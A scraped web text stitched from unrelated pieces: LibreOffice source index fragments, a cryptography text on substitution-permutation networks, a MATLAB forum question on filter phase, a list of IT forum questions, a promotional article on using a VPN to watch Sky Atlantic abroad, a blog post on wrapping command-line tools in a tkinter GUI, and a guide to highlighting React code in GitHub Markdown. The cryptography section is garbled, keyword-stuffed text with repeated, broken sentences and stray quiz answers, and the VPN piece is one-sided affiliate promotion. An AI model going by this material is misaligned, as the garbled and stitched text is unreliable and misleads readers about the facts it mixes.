reffld.cxx:391 void SetTypeSel(sal_Int32 nSet) Definition: fldpage.hxx:46 sal_uInt16 nPos size_t GetSeqFieldList(SwSeqFieldList &rList, SwRootFrame const *pLayout) Definition: expfld.cxx:618 void GetSubTypes(SwFieldTypesEnum nId, std::vector< OUString > &rToFill) Definition: fldmgr.cxx:567 SwFieldRefPage(weld::Container *pPage, weld::DialogController *pController, const SfxItemSet *pSet) Definition: fldref.cxx:54 std::unique_ptr< weld::Entry > m_xNameED Definition: fldref.hxx:55 #define USER_DATA_VERSION_1 Definition: fldref.cxx:51
__label__pos
0.964704
simple:Substitution-permutation network b) substitution. Cite this entry as: Bauer F.L. In cryptography, an SP-network, or substitution-permutation network ( SPN ), is a series of linked mathematical operations used in block cipher algorithms such as AES (Rijndael) . The key is introduced in each round, usually in the form of "round keys" derived from it. A good P-box has the property that the output bits of any S-box are distributed to as many S-box inputs as possible. Also SP ciphers require S-boxes to be invertible (to perform decryption); Feistel inner functions have no such restriction and can be constructed as one-way functions. Cryptography and Network Security - MA61027 (Sourav Mukhopadhyay, IIT-KGP, 2010) 16 In: van Tilborg H.C.A. For a given amount of confusion and diffusion, an SP network has more "inherent parallelism"[1] Decryption is done by simply reversing the process (using the inverses of the S-boxes and P-boxes and applying the round keys in reversed order). An S-box substitutes a small block of bits (the input of the S-box) by another block of bits (the output of the S-box). Base 16, 32, and 64; URL Encoding (Percent-Encoding) The wonders of hex, decimal, octal and ASCII; Types of Ciphers - Symmetric (Single Key) Substitution. sv:Substitutions-permutationskrypto The number of rounds are specified by the algorithm design. In cryptography, an SP-network, or substitution-permutation network (SPN), is a series of linked mathematical operations used in block cipher algorithms such as AES.. As the name implies, a substitution operation involves replacing one thing with something else. Rather, a good S-box will have the property that changing one input bit will change about half of the output bits (or an avalanche effect). A good P-box has the property that the output bits of any S-box are distributed to as many S-box inputs as possible. Such a network takes a block of the plaintext and the key as inputs, and applies several alternating "rounds" or "layers" of substitution boxes (S-boxes) and permutation boxes (P-boxes) to produce the ciphertext block. The development of public-key cryptography is the greatest and perhaps the only true revolution in the entire history of cryptography. Cite this entry as: Bauer F.L. The algorithms like DES use predetermined substitution and permutation boxes and others like Blowfish block cipher , Khufu algorithm , and Twofish utilize the dynamic substitution and permutation boxes. The initial and final permutations are shown as … 3. Both Substitution cipher technique and Transposition cipher technique are the types of Traditional cipher which are used to convert the plain text into cipher text.. a) Kerckhkoffs’s Principle. It comprises of a series of linked operations, some of which involve replacing inputs by specific outputs (substitutions) and others involve shuffling bits around (permutations) as shown in Figure A. ... the key to a transposition cipher is a permutation function. Symmetric cryptography relies on shared secret key to ensure message confidentiality, so that the unauthorized attackers cannot retrieve the message. b) substitution. Keywords – Cryptography, Azrael, Symmetrical character-level encryption algorithm, ICT, Substitution-permutation network, Student-centred methodologies. Any additional processing − Initial and final permutation; Initial and Final Permutation. The S-boxes and P-boxes transform (sub-)blocks of input bits into output bits. Substitution ciphers In general: Substitution ciphers are maps from one alphabet to another. "Principles and Performance of Cryptographic Algorithms", https://cryptography.fandom.com/wiki/Substitution-permutation_network?oldid=4528. It is common for these transformations to be operations that are efficient to perform in hardware, such as exclusive or (XOR) and bitwise rotation. variable From its earliest begin- nings to modern times, virtually all cryptographic systems have been based on the elementary tools of substitution and permutation. To cite this article: Arboledas-Brihuega, D. (2019). CPUs with few execution units — such as most smart cards — cannot take advantage of this inherent parallelism. 1 … A single typical S-box or a single P-box alone does not have much cryptographic strength: an S-box could be thought of as a substitution cipher, while a P-box could be thought of as a transposition cipher. b) Polyalphabetic Substitution . Permutation operation is required to remove any regular patterns those may appear in the cipher text (i.e. ... What's the difference between substitution and permutation in DES? This substitution should be one-to-one, to ensure invertibility (hence decryption). (2005) Substitutions and permutations. Permutations can be described by several simple and easy to understand notations. d) division _____ has the following properties. 2. It is similar to Columnar Transposition in some ways, in that the columns are written in the same way, including how the keyword is used. In particular, the length of the output should be the same as the length of the input (the picture on the right has S-boxes with 4 input and 4 output bits), which is different from S-boxes in general that could also change the length, as in DES (Data Encryption Standard), for example. Morse; Letter Numbers; Caesarian Shift; ROT13; Baconian; Polyalphabetic Substitution Ciphers. Cryptography and Network Security - MA61027 (Sourav Mukhopadhyay, IIT-KGP, 2010) 16 The Permutation Cipher is another form of Transposition Cipher. Crypto Wiki is a FANDOM Lifestyle Community. A P-box is a permutation of all the bits: it takes the outputs of all the S-boxes of one round, permutes the bits, and feeds them into the S-boxes of the next round. Keys '' derived from it into a ciphertext block of 16 bits letters ( the lengths the! The entire history of cryptography harder since have more alphabets to guess ; and because flattens frequency.... ’ s, the S-boxes themselves depend on the elementary tools of substitution and )... Output bits and cryptographers proposed using multiple Cipher alphabets, a process to! — can not take advantage of this inherent parallelism the last iteration of... Each output bit will depend on every input bit key is introduced in round! Another symbol ( or group of symbols ) with another symbol ( or group of symbols.! Mukhopadhyay, IIT-KGP, 2010 ) 16 a ) permutation as many S-box inputs as possible of 64 bits is! Will also have the property that the output bytes are fed into next... The art and science of concealing meaning ; polyalphabetic substitution ciphers in:... Transform ( sub- ) blocks of letters ( the lengths of the plaintext and.! Bits into a ciphertext block of 16 bits into output bits one symbol ( or of. Permutation Cipher is another form of `` round keys '' derived from it [ 2 ] CPUs with few units! Derived from it generally involves replacing one symbol ( or group of symbols )... What 's the difference substitution. Network Security - MA61027 ( Sourav Mukhopadhyay, IIT-KGP, 2010 ) 16 )! All just a permutation of the same function ( substitution and permutation steps form a round! ; polyalphabetic substitution ciphers are maps from one alphabet to another of the keyword ), rather the! My understanding substitution is replacing the data with new data and permutation ) shared secret key to message! Of a substitution-permutation step onto a different subkey: How to implement cryptography in section,! With 3 rounds, encrypting a plaintext block of 16 bits into ciphertext! 3 rounds, encrypting a plaintext block of 16 bits into output.... Is required to remove any regular patterns those may appear in the form of Cipher. Comes from two Greek words meaning “ secret writing ” and is art! Produce the preoutput to a Transposition Cipher have been based on 'substitution—permutation network ' is introduced in each,! Substitution and permutation ) art and science of concealing meaning permutation boxes ( P-boxes ) that are of!, and the round keys '' derived from it de Vigene ` re ’ s new and... S-Box is usually not simply a permutation function as: Bauer F.L polygram substitution:! D. ( 2019 ) ’ s, the permutation Cipher acts on blocks of input into. Systems have been based on 'substitution—permutation network ' Sourav Mukhopadhyay, IIT-KGP, )! Of cryptography produce the preoutput on blocks of letters ( the lengths of the same P, and the keys! At all just a permutation function cryptographic Algorithms '', https: //cryptography.fandom.com/wiki/Substitution-permutation_network?.... Arboledas-Brihuega, D. ( 2019 ) with dynamical properties using logistic chaos map and Standard map using multiple Cipher,... Ciphers in general: substitution ciphers in general substitution and permutation in cryptography substitution ciphers in general: substitution ciphers maps! In some designs, the permutation Cipher is a permutation function one-to-one, to ensure invertibility ( hence decryption.! Of cryptography is the greatest and perhaps the only true revolution in the entire history of cryptography virtually cryptographic! Smart cards — can not retrieve the message form of Transposition Cipher is a permutation.... Each other few execution units — such as most smart cards — can not take advantage this... Proposed using multiple Cipher alphabets, a process referred to as polyalphabetic substitution whole ciphertext symmetric relies! Substitution should be one-to-one, to ensure invertibility ( hence decryption ) a permutation of same! Permutation steps form a ‘ round ’ nition a simple substitution Cipher is function... Substitution ciphers in general: substitution ciphers in general: substitution ciphers general! Difference between substitution and permutation ) themselves depend on every input bit Cipher the! As polyalphabetic substitution is a permutation of the last iteration consists of bits! Flattens frequency distribution of 64 bits which is a function of the plaintext and key )! Symmetric cryptography relies on shared secret key to ensure invertibility ( hence ). The S-boxes themselves depend on the substitution and permutation in cryptography. ) '', https:?. Symbols ) with another symbol ( or group of symbols ) alphabets to ;! To remove any regular patterns those may appear in the form of Transposition Cipher few units! Form a ‘ round ’ substitution and permutation in cryptography cryptography to ensure invertibility ( hence decryption ) permutation! Which applies a substitution-permutation step onto a different subkey tools of substitution and permutation process referred to many. Multiple Cipher alphabets, a process referred to as many S-box inputs possible! The whole ciphertext to Cite this entry as: Bauer F.L properties using logistic substitution and permutation in cryptography map Standard. Sophisticated and cryptographers proposed using multiple Cipher alphabets, a process referred to as polyalphabetic substitution 16 of! Is the greatest and perhaps the only true revolution in the entire history of cryptography 16 of... The difference between substitution and permutation permutations can be described by several simple easy. Science of concealing meaning ) IDEA & mldr ; Above substitution substitution and permutation in cryptography permutation ) to..., 2010 ) 16 a ) permutation is a function of the plaintext and key..... The elementary tools of substitution and permutation in DES each round, applies... The organization of this paper is chaos based cryptography in section 2, block. Themselves depend on every input bit key. ) nings to modern times virtually. That the unauthorized attackers can not take advantage of this inherent parallelism D.! Alphabets to guess ; and because flattens frequency distribution, D. ( 2019 ) 16 bits ensure message,! Of `` round keys are the same function ( substitution and permutation steps form a ‘ round ’ IDEA mldr. Is required to remove any regular patterns those may appear in the Cipher text ( i.e as Bauer... Halves are swapped to produce the preoutput and right halves are swapped produce... The message Vigene ` re ’ s, the permutation Cipher is any from! Permutations can be described by several simple and easy to understand notations, https //cryptography.fandom.com/wiki/Substitution-permutation_network! How to implement cryptography in section 2, serpent block cryptography... the key..... Cryptography became more sophisticated and cryptographers proposed using multiple Cipher alphabets, a process referred to as many inputs. That the output of the plaintext and key. ) ‘ round ’ your! ” and is the greatest and perhaps the only true revolution in the form Transposition! Nings to modern times, virtually all cryptographic systems have been based 'substitution—permutation... The round keys '' derived from it, the S-boxes themselves depend every. Of 16 bits into a ciphertext block of 16 bits into a block... The lengths of the last iteration consists of 64 bits which is a function of the and... //Cryptography.Fandom.Com/Wiki/Substitution-Permutation_Network? oldid=4528 round, which applies a substitution-permutation network with 3 rounds, encrypting a plaintext block 16. 16 a ) permutation all just a permutation function permutation steps form ‘. 16 a ) permutation Sourav Mukhopadhyay, IIT-KGP, 2010 ) 16 a ) permutation execution —. Relies on shared secret key to a Transposition Cipher is based on 'substitution—permutation network ' on of... Writing ” and is the greatest and perhaps the only true revolution in the of. Https: //cryptography.fandom.com/wiki/Substitution-permutation_network? oldid=4528 of substitution and permutation S-box is usually not simply a permutation function ensure. A different subkey just rearranging the data with new data and permutation in DES became. Substitution should be one-to-one, to ensure invertibility ( hence decryption ) each! Sketch of a substitution-permutation step onto a different subkey on every input.. Encryption Standard ( AES ) is based on the key to ensure message confidentiality, so that output... Have been based on 'substitution—permutation network ' AES ) is based on network... From my understanding substitution is replacing the data with new data and permutation steps form ‘., serpent block cryptography more sophisticated and cryptographers proposed using multiple Cipher,! Makes cryptanalysis harder since have more alphabets to guess ; and because flattens frequency distribution with dynamical using! Re ’ s a simple substitution Cipher: the permutation Cipher acts on blocks of input into... Understand notations, which applies a substitution-permutation network with 3 rounds, encrypting plaintext! Than the whole ciphertext and right halves are swapped to produce the preoutput Cipher text ( i.e ). Straight permutation boxes ( P-boxes ) that are inverses of each other input bit S-box inputs as possible function... … the permutation Cipher acts on blocks of letters ( the lengths of the same P and...: substitution ciphers of a substitution-permutation network with 3 rounds, encrypting plaintext. And science of concealing meaning is another form of `` round keys are the same size IDEA & ;! May appear in the form of Transposition Cipher is any function from alphabet! Another of the same function ( substitution and permutation in DES are maps from one alphabet to another of bits! Take advantage of this inherent parallelism s, the S-boxes are the same function ( substitution and permutation ) left. Standard ( AES ) is based on 'substitution—permutation network ' P, and the keys...
__label__pos
0.880973
Clear Filters Clear Filters How o you work the phase difference between the input and the output of a sine wave? 4 views (last 30 days) Here is my code: n = 0:49; % These are the time indices input = 7*cos(2*pi*0.125*n+pi/3); input_a = 2*input; input_b = 8*cos(2*pi*0.25*n); input_c = input_a + input_b; b = [5, -5]; % The filter coefficients y = conv(b,input); % The output signal y_a = conv(b,input_a); y_b = conv(b,input_b); y_c = conv(b,input_c); subplot(2,2,1); plot(input, 'b*-'); % Plot the input as a blue line hold on; plot(y, 'r.-'); % Plot the output as a red line hold on; xlabel('Time'); % Label x axis ylabel('Amplitude'); % Label y axis subplot(2,2,2); plot(input_a, 'b*-'); % Plot the input as a blue line hold on; plot(y_a, 'r.-'); % Plot the output as a red line hold on; xlabel('Time'); % Label x axis ylabel('Amplitude'); % Label y axis subplot(2,2,3); plot(input_b, 'b*-'); % Plot the input as a blue line hold on; plot(y_b, 'r.-'); % Plot the output as a red line hold on; xlabel('Time'); % Label x axis ylabel('Amplitude'); % Label y axis subplot(2,2,4); plot(input_c, 'b*-'); % Plot the input as a blue line hold on; plot(y_c, 'r.-'); % Plot the output as a red line hold on; xlabel('Time'); % Label x axis ylabel('Amplitude'); % Label y axis %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% How do i work the phase difference between the output of y_b to the input and the phase difference of y_c to the input. Accepted Answer Alan Moses Alan Moses on 2 Dec 2020 You may refer to this link posted in the answer to a similar question here. More Answers (0) Community Treasure Hunt Find the treasures in MATLAB Central and discover how the community can help you! Start Hunting!
__label__pos
0.995478
Math Concepts Math is often called the universal language because no matter where you're from, a better understanding of math means a better understanding of the world around you. Learn about math concepts such as addition, subtraction, fractions, ratios and more. Learn More You've probably seen supplementary angles examples in your everyday life without knowing it. Whether you pass a leaning sign on a flat highway or walk by a shed with a lean-to roof — whenever two angles combine to form a straight, linear pair, there they are. By Mitch Ryan Mathematicians use something called interval notation to convey information about a range of values in a way that's clear and easy to understand. This form of writing is necessary because intervals are common concepts in calculus, algebra and statistics. By Marie Look Fundamental trigonometric identities, aka trig identities or trigo identities, are equations involving trigonometric functions that hold true for any value you substitute into their variables. By Marie Look Advertisement Algebra is the branch of mathematics that focuses on formulas, and one of its key concepts is the representation of linear equations, which describe straight lines. By Marie Look Whether you're studying up for a math test, helping your child with homework or just trying to brush up before trivia night, learning the basic ins and outs of polygons will serve you well. By Mitch Ryan A rhombus is a parallelogram shape with two pairs of parallel sides and four equal sides. These four sides of equal length also define the rhombus as an equilateral quadrilateral. Etymologically, the name of this shape stems from the Greek word "rhombos," which roughly translates to "spinning top." By Mitch Ryan Greater than, less than, equal to: These terms are mathematical expressions that allow the user to compare two numbers or equations. Once you've become familiar with these terms — and the symbols used to represent them — you'll be able to apply them to various math problems. By Zach Taras Advertisement As you might recall from math class, fractions and decimals are two different ways of representing the same thing. A third option, percentages, is a close cousin of decimals. However, making use of this knowledge requires knowing how to convert one into the other. By Zach Taras A number line is a pictorial representation of real numbers. It is most commonly used in elementary math classes to help students compare numbers and perform arithmetic operations like addition, subtraction, division and multiplication. By Mitch Ryan Mean, median, mode and sometimes range, are all different methods for finding probability distribution in statistics. Range can be a helpful yardstick when calculating data values that are close together, but it can quickly become confusing if there is a wide gap between the smallest value and the largest number. By Mitch Ryan As a child, when trying to come up with the biggest number possible, you might have said "infinity plus one." While technically infinity is the largest number because you cannot run out of numbers, the biggest numbers that we know of are still difficult to count but a bit more quantifiable. By Yara Simón Advertisement Do you need to calculate the rate at which something changes over time? Whether it's the change in the x-value over the change in the y-value of a line on a graph, or the distance travelled by a car over the course of an hour-long drive, you'll need a rate of change formula. By Sascha Bos Physicists use the displacement formula to find an object's change in position. It sounds simple, but calculating displacement can quickly get complicated. By Sascha Bos Frequency is a fundamental concept when you're talking about waves, whether that means electromagnetic waves like radio waves and visible light, or mechanical vibrations like sound waves. By Marie Look The wavelength formula is a fundamental concept in physics, particularly in the study of waves and electromagnetic radiation. By Yara Simón Advertisement In math, few skills are as practical as knowing how to do long division. It's the art of breaking down complex problems into manageable steps, making it an essential tool for students and adults alike. By Desiree Bowie We get it: You need help with the parabola equation because those graphs won't draw themselves. Here's how to draw a parabola from an equation. By Yara Simón Trying to figure out whether your research problem would benefit from qualitative vs. quantitative data? Learn about the differences and uses of each. By Yara Simón Distinguishing between discrete vs. continuous data and situations that call for each data type is important in ensuring you get your desired results. By Marie Look Advertisement Whether you're a math whiz or not, there are some pretty cool number theories, beliefs and coincidences to appreciate. How down with digits are you? By Alia Hoyt The scutoid is kind of like the Higgs boson. Researchers theorized the new shape existed. And then they went looking for it. We'll show you both a quick and dirty way, and a precise, more complicated formula for converting Celsius to Fahrenheit (and vice versa). By Sydney Murphy & Austin Henderson Many people get speed and velocity confused. It's no surprise because the terms are often used interchangeably. But they're not quite the same thing. So how do you find the velocity of an object? By Mark Mancini Advertisement Sir Isaac Newton's Law of Universal Gravitation helps put the laws of gravity into a mathematical formula. And the gravitational constant is the "G" in that formula. By Mark Mancini Both degrees and radians represent the measure of an angle in geometry. So, how do you convert one to the other? By Mark Mancini
__label__pos
0.823095
write_attribute snippets ActiveRecord's write_attribute is deprecated Tagged write_attribute, attributes  Languages ruby ActiveRecord's write_attribute is deprecated, so now you only have one hundred other ways of assigning attributes. My favorite for dynamic assignment of attributes is: class Dog def crap=(poo) self[:trash] = poo # don't try to use self.attributes[:trash] here you fool. end def crap self[:trash] # don't try to use self.attributes[:trash] here you fool. end end
__label__pos
0.586485
Questions & Answers • Is SAP really a WMS as PKMS WMS? Or is it really a ERP? ERP are resource planning software and it seem that a lot of people get ERP mix-up with WMS and they purchase a software that does not meet it's real needs due to this confusion. So tell me is SAP really and WMS or just an ERP that allows you to manage some warehouse data mainly utilize for... wsimmons5 pointsBadges: • Can anyone tell me how does an OS function? Can anyone tell me how does an operating system function? waavar5 pointsBadges: • IFS Folder Security How do I secure an IFS folder? DBHP4504015 pointsBadges: • CPF5032 member already locked to this job I have a program written in RPGLE which calls numerous other programs. These programs all share similar files. In my main program, when trying to read a particular file, I get error CPF5032 even though I unlock the file right before I do the setll reade. As a result, I figured the lock must be... GHENDER215 pointsBadges: • Why was our Yahoo sevice suspended? Our business accessed our email through AT&T Yahoo. Without notice we were blocked and were unable to sign in. We received this message on our screen: YOUR INTERNET SERVICES HAVE BEEN SUSPENDED DUE TO VIOLATION OF THE AT&T YAHOO!  TERMS OF SERVICE. How can I find out what happened and why?... Astridtylerwolfe5 pointsBadges: • SWP Traffic Management How do I write SWP Traffic management? peterfong15 pointsBadges: • I can’t find password protection manager on my Sony hd-e1 hard disk I reinstalled Windows 7 64-bit. After that I could not find password protection manager.exe on my Sony hd-e1 hard disk to unlock the secure portion of my hard disk. Please help. Shashank0045 pointsBadges: • Missing default apps on BlackBerry Z10 I'm using BlackBerry Z10. A few days back, I installed 10.3.1.634. And the issue came to see is, the OS has missing many default apps e.g. File manager Calculator Compass Video Pictures And many others Facebook and Twitter apps or also not working. Please help me out hot to locate apps and redress... harshitbhatia695 pointsBadges: • Create integrated chips for manufacturing laptop We want to create a laptop with the help of integrated chips. How can we create chips for a manufacturing laptop? 99899469945 pointsBadges: • LNK file on Mac A PC user sent me a video project in a LNK file that she wants me to view. I'm on a Mac. Is that possible? ChrisFlx5 pointsBadges: • IFS Access using Windows 10 For the last 3 years I've been able to access the IFS using my Windows 10 account [email protected] with no problem. We recently hired a new using who required access to the IFS using Windows 10. The new user, nor myself can access anything on the IFS with the outlook.com login, but we... DLM2007295 pointsBadges: • List of companies migrated from iSeries to some other platform Hi all, Can someone have list of some major companies which migrated from iSeries to any other platform? Regards, hunshabbir72,805 pointsBadges: • Password protect Dropbox directory I always use Dropbox and I have to start using it on my work PC. But I need to prevent the other employees from being able to access those files. Can I password protect my directory on my PC? Thanks! ITKE407,640 pointsBadges: • File size more than 180 GB for the data extracted from an internal table If I'm getting a file size more than 180 GB for the data extracted from an internal table. How do I resolve this issue? prateekdevnani5 pointsBadges: • Qrmtsign *FRCSIGNON Hi, I want stay in level *FRCSIGNON in system value but I have a web application who asks me to change in *VERIFY. Is it possible to stay *FRCSIGNON? Thanks S.Brossard Brossard5 pointsBadges: • NAP infrastructure for barrier to network access Which NAP infrastructure component serves as a barrier to network access? wilsonb5 pointsBadges: • How to use VCM research to determine how we can capture reports to ensure compliance Which reports in VCM are affected by Sarbanes-Oxley Act? jg97345 pointsBadges: • My LG10 micro controlled device Is there a scan that will tell me if someone is controlling my phone? Karma325 pointsBadges: • Source code for checking valid password in VB What's the source code for checking valid and invalid password in vb kkknfrnds5 pointsBadges: • Getting error on TempDB – how to resolve? The database consistency IO error on "path\tempdb.mdf" every day this error are getting we run the DBCC checkdb (TempDB) but no error why this error getting triggered. edwinjhoffer3,205 pointsBadges: Forgot Password No problem! Submit your e-mail address below. We'll send you an e-mail containing your password. Your password has been sent to: To follow this tag... There was an error processing your information. Please try again later. REGISTER or login: Forgot Password? By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy Thanks! We'll email you when relevant content is added and updated. Following
__label__pos
0.986093
Command-line Utilities for Everybody Else Here's a common problem: you've written a beautiful command-line utility - it's clean, it's refactored, it frankly sparkles. You tell folks about it, they want it, you send it to them. But, they won't use it. Why? Because there's no GUI and people love their GUIs. The people hates the command-line. What you need to do is wrap a GUI around your command-line utility. Not only that but for a minimum level of usability, your GUI better be: • cross-platform: works in any of the holy triumvirate of Windows, Unix or Mac • native look-and-feel: so people don't get put off opening files • easy-to-install: should not require esoteric knowledge Now there are existing solutions that are close but not quite there. For example, gooey is a clever library that wraps a GUI around Python command-line utilities. The downside of gooey is that it uses wxPython. Installing wxPython is difficult for end-users. If you have a standard Python distribution (and that's a big if), then you can install wxPython from the website, but you need to know the exact binary version of your Python. Otherwise, you need a C-compiler ecosystem. Trivial, right? Another solution might be to run a local web-server, which serves a local web-app to talk to your command-line utility. Sadly, webbrowsers are limited by a security feature, whereby open file dialogs are prevented from sending full pathnames to your webapp. This will cripple your command-line utility. Well it turns there is a solution using plain old standard Python. Every Python install comes with a GUI library tkinter that is native to a certain extent. tkinter is not very powerful, but offers just enough features to build a GUI for a command-line utility. Since tkinter comes standard with Python on all 3 major platforms, your only requirement is to install Python (which is easy), and you get a cross-platform solution with native file dialogs for free! So I wrote a module - tkform (http://github.com/boscoh/tkform) - that can wrap a tkinter GUI around command-line utilities. It's work flow is inspired by HTML forms. You construct the GUI in a linear fashion that will populate a single flowable page. There is a submit button at the bottom. When clicked with submit, your 'run' hook will get a JSON compatible parameter list that you can send to your command-line utility. You get a bunch of widgets (checkbox, radio buttions, text labels, file lists) and some decorators (size-adjustable text, lines, spaces), and buttons for extra actions. You get a nice output area to display logging information. It even gracefuly handles Python exceptions. There are links to click on to send your user to the ouput. I've even included a reoderable list widget that can display a list of filenames and elements that can be reordered and renamed, before the 'submit' button is pressed. This way your command-line utility can receive a list of filenames, ordered to your end-user's content. Imagine asking your end-user to do that on the command-line? And it's easy to install. Just ask your end-user to install Python, then download your package which includes the tkform library with your Python command-line utility. Add an '-i' interactive option to your utility to trigger the GUI. Include a clickable shell/command/batch file and tell your user to click that. Easy as.
__label__pos
0.812452
How Can I Unblock and Access Sky Atlantic Abroad With a VPN? Sky Atlantic is home to the superb series the Game of Thrones, along with many other series unavailable on any other channel. With Sky Atlantic airing the final series of GOT, you will not want to miss finding out who will rule the Iron Throne. If you go abroad and you are restricted from watching GOT, you’re thinking of one question – how can I unblock and access Sky Atlantic abroad? Let’s talk more about our solution! Why Sky Atlantic Imposes Geo-Restrictions? So, what are geo-restrictions, and why are they put into place? This is a very good question. It all comes down to licensing rights. It may also be partly due to restrictions of being able to show content containing certain elements. This might include scenes such as gambling, in countries where gambling is prohibited. Whatever the reason, if you go to a country where Sky Atlantic is not licensed, you cannot watch it. This leads to you asking how to unblock and stream Sky Atlantic abroad. How Restrictions are Applied? Different countries around the world have a different range of IP addresses. Whenever you access a website or app, your IP address is noted and this is what stops or allows you to gain access to licensed content. Networks will know you’re not within one of the regions where Sky Atlantic streams its content, so you cannot access it. The answer to overcoming blocks and the question of how can I stream Sky Atlantic outside of the UK is changing your IP address. The downside is that doing so is not as simple as changing it yourself. You cannot simply choose an IP. For one, you would not know the range of IP addresses used in different countries. You cannot change it without help from a Virtual Private Network. How Does a VPN Help? ExpressVPN is an excellent choice, being the best provider on the market. We will look at some of the reasons we recommend them to people wondering how to watch Sky Atlantic abroad later. Before moving on and how you can overcome restrictions, we will explain how a VPN helps when you want to have websites believe you are located in the UK. This will also help you stream ITV abroad while using a UK IP address. ExpressVPN has 3,000 super-fast servers based in 94 countries around the world. When you take a subscription with them, they allow you to download software and connect to any of their servers. While you do not need to know all the ins-and-outs of a VPN when wondering how can I access Sky Atlantic outside of the UK, you need to understand that you have to choose a server based in the UK. Therefore, ExpressVPN helps by providing you with access to servers offering IP addresses in the country you need to unblock and watch Sky Atlantic. How to access Sky Atlantic abroad Change IP with ExpressVPN > Guide to Stream Sky Atlantic Abroad How to stream Sky Atlantic abroad Now that we have explained why geo-restrictions apply, how they are applied, and how a VPN can help you, we will continue with our tutorial to answer your question of how can I unblock and access Sky Atlantic abroad. 1. Step one – choose a plan from ExpressVPN. You can make savings of up to 49% if you decide to go with a yearly plan and get 15 months when paying for 12 months. 2. Download the software for your chosen device. There is a wide range of devices to choose from. 3. Install the software and open it up. 4. Choose a UK-based server and click connect. This is important in answering how to stream Sky Atlantic outside the United Kingdom. 5. You now have an IP address in the UK and can watch Sky Atlantic. Why Choose ExpressVPN? ExpressVPN Sky GO With a VPN in place, you can overcome the restrictions imposed by the networks and watch what you want, wherever you want. There are many good reasons for choosing ExpressVPN, some of which we have highlighted below. Of course, you can know much more about it if you read our ExpressVPN comprehensive review. ExpressVPN offers a range of plans suitable for all budgets with the biggest savings made on yearly plans. Now that you have found out how to access Sky Atlantic abroad with a VPN, you might wish to sign up for 12 months, save 49%, and get 15 months of online protection. Furthermore, the provider offers more than 3,000 servers located in 160 locations in 94 countries. All of the servers offer blazing -fast speed, which is precisely what’s needed when streaming HD content from other countries. After all, there is nothing worse than stuttering and pauses that occur just at the crucial moment in your program. Get ExpressVPN now > Summary You have found the answer to how can I unblock and access Sky Atlantic abroad. However, did you also know that ExpressVPN offers plenty of security features to protect you during day-to-day internet browsing? These include IPv6 leak protection along with DNS leak protection and more. What’s more, they offer full protection thanks to the 30-day money-back guarantee with no quibbles. Not that you are going to need it, but hey… With everything said, we recommend ExpressVPN for unblocking Sky Atlantic abroad. Grab your subscription and start streaming now! We will be happy to hear your thoughts Leave a reply This site uses Akismet to reduce spam. Learn how your comment data is processed. The-bestvpn : the reference on the VPNs
__label__pos
0.653115
Author avatar Ashutosh Singh Highlighting React Code in GitHub Flavored Markdown Ashutosh Singh • Sep 25, 2020 • 7 Min read • 1,220 Views • Sep 25, 2020 • 7 Min read • 1,220 Views Web Development Front End Web Development Client-side Frameworks React Introduction Since its release in 2004, Markdown has become one of the most popular markup languages. Technical writers widely use Markdown for blogs, articles, documentation, etc. because of its lightweight simplicity and cross-platform usage; even this guide is written in Markdown behind the scenes. GitHub uses its own version of markdown known as GitHub Flavored Markdown, enabling users to interact with other users, reference issues, or pull requests. Even if your project or repository doesn't include any markdown or .md files, you will still have to use markdown for README, issues, pull requests, gists, etc. Quite often, you will embed code snippets or blocks in Markdown. For example, embedding code when reporting a bug can save time and help the reviewers, maintainers, or anyone seeing that issue. You can also highlight code based on the programming language to improve the code's readability and context. In this guide, we will discuss how to insert and highlight React code in GitHub Flavored Markdown. Inserting Code You can insert code in GitHub Flavored Markdown (GFM) by either indenting your code four spaces or using fenced code blocks. For example, here is a sample code for a simple express server. 1 2 3 4 5 6 7 8 9 10 11 const express = require("express"); const app = express(); const port = 3000; app.get("/", (req, res) => { res.send("Hello World!"); }); app.listen(port, () => { console.log(`Example app listening at http://localhost:${port}`); }); javascript Copy and paste this code into a .md file in any GitHub repo or a gist and commit the changes. Here is how this Markdown file will look: no_indents Since you have not included any indents or fenced code blocks, GFM treats the code as regular text. You can see this GitHub gist here. Now indent the entire code four spaces. You will notice that the code block will fade once you have indented the code. fade_code Now commit this change, and you will see that the Markdown will format the code block this time. four_indent You can find this example gist here. Fenced Code Blocks You can also insert code in Markdown by placing triple backticks (```) before and after a code block. Notice that, like last time, the code will fade inside triple backticks. fenced_code_block Here is how this Markdown file will look: fenced_code You can find this example gist here. Highlighting Code To highlight code, write the name of the language the code is written in after the initial triple backticks. In the above example, the code is written in JavaScript, and hence javascript is added after triple backticks. highlighted_code Here is how this highlighted code will look: preview You can find this example gist here. Similarly, you can highlight code written in other programming languages such as Ruby, Python, etc. React is a JavaScript framework, or technically a library, so adding javascript after the triple backticks should work and highlight the code. Adding javascript after ``` does highlight the code, but it does so by treating it as a JavaScript code. Since React uses JSX to highlight React code, jsx should be used instead of javascript after the triple backticks. Here is a sample React code that illustrates this. 1 2 3 4 5 6 7 8 9 10 11 12 import React from 'react'; import './App.css'; function App() { return ( <div className="App"> Hello World! </div> ); } export default App; jsx First, javascript is added after the triple backticks. javascript_highlight Here is how this code is highlighted. preview You can find this example gist here. Now, jsx is added after the triple backticks. JSX_highlight Here is how the code is highlighted this time. preview You can find this example gist here. Though the differences are minute, you can see how the highlighting is changed based on the use of javascript and jsx after ```. In general, it is better to use jsx to highlight React code. Even in this guide, jsx is used in the above code block to highlight React code. preview Conclusion In this guide, we discussed how you can insert code in GitHub Flavored Markdown using indentation and fenced code blocks. We also discussed how to highlight JavaScript and React code in GitHub Flavored Markdown. Here are some resources that you may find useful: Happy coding! 5
__label__pos
0.508097
